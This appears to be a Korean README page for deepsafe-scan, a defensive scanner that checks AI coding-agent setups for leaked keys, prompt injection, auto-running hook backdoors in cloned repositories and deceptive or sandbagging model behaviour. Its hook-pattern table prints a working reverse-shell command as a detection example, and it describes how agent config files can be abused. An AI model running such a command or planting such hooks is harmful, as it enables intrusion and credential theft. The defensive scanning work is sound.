XiaoYiWeio/deepsafe-scan

AI Agent 환경 범용 보안 사전 점검 스캐너

실행 전 먼저 스캔하세요. 단 한 줄의 명령어로 당신의 AI Agent 환경을 키(Key) 유출, 프롬프트 주입 (Prompt Injection), Hooks 백도어 공격으로부터 보호합니다.

이러한 공격들이 어떻게 작동하는지 알고 싶으신가요? → AI Agent Attack Techniques

⚡ 공격자는 단 3초 만에 당신의 AI Agent 환경에서 SSH Key, API Key 및 모든 민감한 자격 증명을 훔칠 수 있습니다.

↓ 실제 공격 시연 (3배속) · 전체 원본 속도 영상 보기 →

당신이 다음에 클론(clone)할 저장소는, 어쩌면 당신이 열어주기만을 기다리고 있을지도 모릅니다.

지원 플랫폼:

OpenClaw

Claude Code

Cursor

Codex

OpenCode

DeepSafe Scan은 AI가 생성한 코드를 실행하거나 새로운 스킬(Skills)을 설치하기 전에 5가지 차원에서 **보안 사전 점검 (Security Pre-check)**을 수행합니다:

모듈	탐지 내용	API 필요 여부?
posture	`openclaw.json` / `.env` — 안전하지 않은 게이트웨이 설정, 노출된 키	아니요
skill	설치된 Skills 및 MCP 서버 — 15개 이상의 정적 분석기 (키, 위험한 호출, eval, 데이터 유출)	아니요 (LLM 선택 사항)
memory	세션 및 메모리 파일 — 27가지 키 패턴, 9가지 PII(개인정보) 유형, 프롬프트 주입 (Prompt Injection)	아니요
hooks	`.claude/settings.json`, `.cursorrules`, `.windsurfrules`, `opencode.json`, `.opencode/agents/`, `.opencode/commands/`, `.vscode/tasks.json`, `CLAUDE.md`, `AGENTS.md` — 12가지 주입 패턴	아니요
model	4가지 행동 보안 탐지: 조작 유도, 능력 은닉, 기만적 답변, 환각 (Hallucination) 생성	예

4개의 정적 모듈은 어떠한 API Key도 필요 없이 실행 가능합니다. LLM 기능은 기존 자격 증명을 자동으로 탐지하므로 수동 설정이 필요 없습니다.

AI 프로그래밍 Agent (Claude Code, Cursor, Windsurf, Codex)의 설정 파일은 명령어 자동 실행을 지원합니다. 공격자는 오픈소스 저장소에 악성 설정을 심어둘 수 있습니다:

공격 벡터	트리거 시점	사용자 확인 필요?
`.claude/settings.local.json` SessionStart hooks	Claude Code 시작 시	아니요, 자동 실행
`.vscode/tasks.json` runOn: folderOpen	Cursor/VSCode 디렉토리 오픈 시	아니요, 자동 실행
`.cursorrules` / `.windsurfrules` / `opencode.json` / `.opencode/agents/` / `CLAUDE.md` / `AGENTS.md`	Agent가 읽고 명령을 실행할 가능성 있음	일부 상황에서 자동

한 줄 설치, 한 문장 사용으로, 이제 클론(clone)할 때 무방비 상태로 노출되지 마세요.

clawhub install deepsafe-scan

설치 후, AI Agent에게 자연어로 직접 말하세요:

"deepsafe scan을 사용해서 이 프로젝트를 스캔해줘"

Agent가 자동으로 스캔하고 보고서를 반환하며, 어떠한 명령어도 외울 필요가 없습니다.

Claude Code 사용자 — CLAUDE.md를 프로젝트 루트 디렉토리에 복사하면 통합됩니다: cp ~/deepsafe-scan/CLAUDE.md /your/project/

git clone https://github.com/XiaoYiWeio/deepsafe-scan ~/deepsafe-scan
python3 ~/deepsafe-scan/scripts/scan.py \
--modules hooks \
...

Python 코어는 오직 표준 라이브러리만을 사용합니다: urllib, json, re, hashlib, subprocess, concurrent.futures, argparse, dataclasses.

pip install이 필요하지 않습니다.

플랫폼	API 자동 탐지	Hooks 스캔	Skills 스캔	설명
OpenClaw	✅ `~/.openclaw/openclaw.json` 읽기	✅	✅	완전한 네이티브 지원
Claude Code	✅ `ANTHROPIC_API_KEY`	✅ `.claude/settings.json`	✅ 임의 디렉토리	Claude Hooks 파일 검사
Cursor	✅ `OPENAI_API_KEY` (설정된 경우)	✅ `.cursorrules`	✅ 임의 디렉토리	모델 탐지를 위해 사용자 Key 필요
Codex	✅ `OPENAI_API_KEY`	✅ `AGENTS.md`	✅ 임의 디렉토리	Key 없이도 완전한 정적 스캔 가능
Windsurf	✅ `OPENAI_API_KEY` (설정된 경우)	✅ `.windsurfrules`	✅ 임의 디렉토리	Windsurf 설정 파일 검사
OpenCode	✅ `ANTHROPIC_API_KEY` / `OPENAI_API_KEY`	✅ `opencode.json`, `.opencode/`	✅ 임의 디렉토리	OpenCode 설정, agents 및 commands 검사
기타	`--api-base / --api-key`	✅	✅	모든 OpenAI 형식 API와 호환

deepsafe-scan/
├── scripts/
│ ├── scan.py # 메인 엔트리포인트 (5개 모듈, HTML/markdown/JSON 출력)
...

AI Agent 배포 설정을 검사합니다:

안전하지 않은 게이트웨이 인증 (평문 HTTP, 인증 없음, 기본 비밀번호)
설정 파일에 노출된 API Keys
과도하게 넓은 권한의 보안 설정
프로덕션 환경에서 활성화된 디버그 모드

OpenClaw 사용자는 openclaw.json을 읽고, 다른 플랫폼은 .env, config.json 등을 검사합니다.

설치된 모든 Skills 및 MCP 서버 디렉토리를 스캔하여 다음을 탐지합니다:

하드코딩된 키 (27가지 패턴 — API Keys, Token, 비밀번호)
원격 코드 실행 (RCE) 패턴 (eval, exec, 사용자 입력이 포함된 subprocess)
데이터 유출 (curl/wget/requests를 통한 외부 호스트로의 전송)
시스템 프롬프트 내의 프롬프트 인젝션 (Prompt Injection) 시도
위험한 파일 작업, 셸 인젝션 (Shell Injection), 경로 탐색 (Path Traversal)

선택 사항: LLM 시맨틱 분석 (Semantic Analysis)을 통해 복잡한 난독화 패턴을 발견할 수 있습니다.

세션 로그 및 Agent 메모리 파일을 스캔합니다:

27가지 키 패턴: OpenAI Key, Anthropic Key, GitHub Token, AWS 자격 증명, Slack, Stripe, 데이터베이스 URL, SSH Key, JWT Secret
9가지 PII(개인정보) 유형: 이메일, 전화번호 (국제 형식), SSN, 여권, 신용카드 (Luhn 검증), 의료 코드, 운전면허증, 은행 계좌, 신분증
프롬프트 인젝션 (Prompt Injection): 탈옥 (Jailbreak) 조각, 역할 덮어쓰기 시도, 지시 사항 덮어쓰기

AI 프로그래밍 어시스턴트 설정 파일 내의 커맨드 인젝션 (Command Injection) 백도어를 스캔합니다:

패턴	심각도	예시
리버스 셸 (Reverse Shell)	CRITICAL	`bash -i >& /dev/tcp/10.0.0.1/4444 0>&1`
...

검사 파일: .claude/settings.json, .claude/settings.local.json, .cursorrules, .cursor/rules.md, .windsurfrules, .windsurf/rules.md, opencode.json, opencode.jsonc, .opencode/agents/, .opencode/commands/, .vscode/tasks.json, .vscode/settings.json, .github/copilot-instructions.md, CLAUDE.md, AGENTS.md.

4가지 행동 보안 평가 (LLM API 호출):

탐지 항목	테스트 내용
조작 유도	모델이 조작되어 사용자의 관점을 변경할 수 있는지
능력 은닉	모델이 실제 능력을 숨기기 위해 의도적으로 성능을 낮게 보이는지
기만적 답변	직접적인 질문을 받았을 때 모델이 허위 정보를 제공하는지
환각 생성	모델이 검증 불가능한 사실을 날조하는지

각 탐지(detection) 실행은 일련의 소규모 평가를 수행하며, 0–100 사이의 안전 점수(safety score)를 반환합니다.

python3 scripts/scan.py [옵션]
핵심 옵션:
--modules 쉼표로 구분: posture,skill,memory,hooks,model
...

총점	위험 등급	권장 조치
85–100	🟢 저위험	사용 가능
...

자격 증명(credentials)은 다음 우선순위에 따라 자동으로 파싱됩니다:

--api-base / --api-key 파라미터
↓ (설정되지 않은 경우)
OpenClaw 게이트웨이 (~/.openclaw/openclaw.json)
...

Cursor 사용자: Cursor는 내부 관리 LLM 인증을 구독함으로써 API Key가 자식 프로세스(child process)에 노출되지 않도록 합니다. Model 탐지를 활성화하려면 Shell에서 OPENAI_API_KEY를 설정하거나 --api-key를 전달하십시오. 모든 정적 모듈(static modules)은 어떠한 Key도 필요하지 않습니다.

항목	위치
ai-agent-attack-techniques	공격 기술 참조 매뉴얼 — deepsafe-scan이 탐지하는 공격의 구체적인 원리와 PoC(Proof of Concept)를 기록함

Issue 및 PR 제출을 환영합니다: github.com/XiaoYiWeio/deepsafe-scan

📖 온라인 문서 · 문제 피드백 · OpenClaw 생태계

DeepSafe Scan은 OpenClaw 생태계의 일부인 동시에 독립적으로 사용할 수 있는 보안 도구이며, 모든 주요 AI 프로그래밍 에이전트(Agent)를 지원합니다.

Insights

XiaoYiWeio/deepsafe-scan

요약

핵심 포인트

댓글

자기 학습 에이전트가 첫 번째 성공을 신뢰해서는 안 되는 이유

AI 코딩 에이전트가 편법을 쓰는 14가지 방식 — 그리고 프롬프트 엔지니어링(Prompt Engineering)만으로는 부족한 이유

관리① Git 리포지토리·애플리케이션 관리

모닝 미닛: 온체인(Onchain)으로 이동하는 월스트리트가 다음 강세장을 주도할 것

자기 학습 에이전트가 첫 번째 성공을 신뢰해서는 안 되는 이유

AI 코딩 에이전트가 편법을 쓰는 14가지 방식 — 그리고 프롬프트 엔지니어링(Prompt Engineering)만으로는 부족한 이유

관리① Git 리포지토리·애플리케이션 관리

모닝 미닛: 온체인(Onchain)으로 이동하는 월스트리트가 다음 강세장을 주도할 것